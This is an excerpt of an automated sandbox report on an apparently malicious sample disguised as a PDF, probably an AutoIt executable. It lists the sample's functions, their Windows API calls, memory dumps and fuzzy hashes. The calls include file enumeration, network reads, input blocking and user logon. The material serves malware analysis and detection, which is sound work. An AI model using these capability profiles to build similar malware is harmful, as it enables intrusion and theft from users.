                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                              • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                              Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: U$\
                              • API String ID: 4104443479-100911408
                              • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                              • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                              Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNext
                              • String ID:
                              • API String ID: 3541575487-0
                              • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                              • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                              Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                              • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                              • FindClose.KERNEL32(00000000), ref: 004339EB
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FileFind$AttributesCloseFirst
                              • String ID:
                              • API String ID: 48322524-0
                              • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                              • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                              • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                              Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                              Download Yara Rule
                              APIs
                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                              • String ID:
                              • API String ID: 901099227-0
                              • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                              • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                              • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                              • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                              Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                              Download Yara Rule
                              APIs
                              • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Proc
                              • String ID:
                              • API String ID: 2346855178-0
                              • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                              • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                              • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                              Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • BlockInput.USER32(00000001), ref: 0045A38B
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: BlockInput
                              • String ID:
                              • API String ID: 3456056419-0
                              • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                              • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                              • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                              Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LogonUser
                              • String ID:
                              • API String ID: 1244722697-0
                              • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                              • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                              • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                              Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                              • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                              • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                              • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                              Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                              Download Yara Rule
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                              • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                              • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                              • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                              Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: N@
                              • API String ID: 0-1509896676
                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                              Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                              • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                              • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                              • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                              Function 004129D0 Relevance: .4, Instructions: 355COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                              Function 004125E8 Relevance: .3, Instructions: 349COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                              Function 00412216 Relevance: .3, Instructions: 332COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                              Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                              Download Yara Rule
                              APIs
                              • DeleteObject.GDI32(?), ref: 0045953B
                              • DeleteObject.GDI32(?), ref: 00459551
                              • DestroyWindow.USER32(?), ref: 00459563
                              • GetDesktopWindow.USER32 ref: 00459581
                              • GetWindowRect.USER32(00000000), ref: 00459588
                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                              • ShowWindow.USER32(?,00000004), ref: 00459865
                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                              • GetStockObject.GDI32(00000011), ref: 004598CD
                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                              • DeleteDC.GDI32(00000000), ref: 004598F8
                              • _wcslen.LIBCMT ref: 00459916
                              • _wcscpy.LIBCMT ref: 0045993A
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                              • GetDC.USER32(00000000), ref: 004599FC
                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
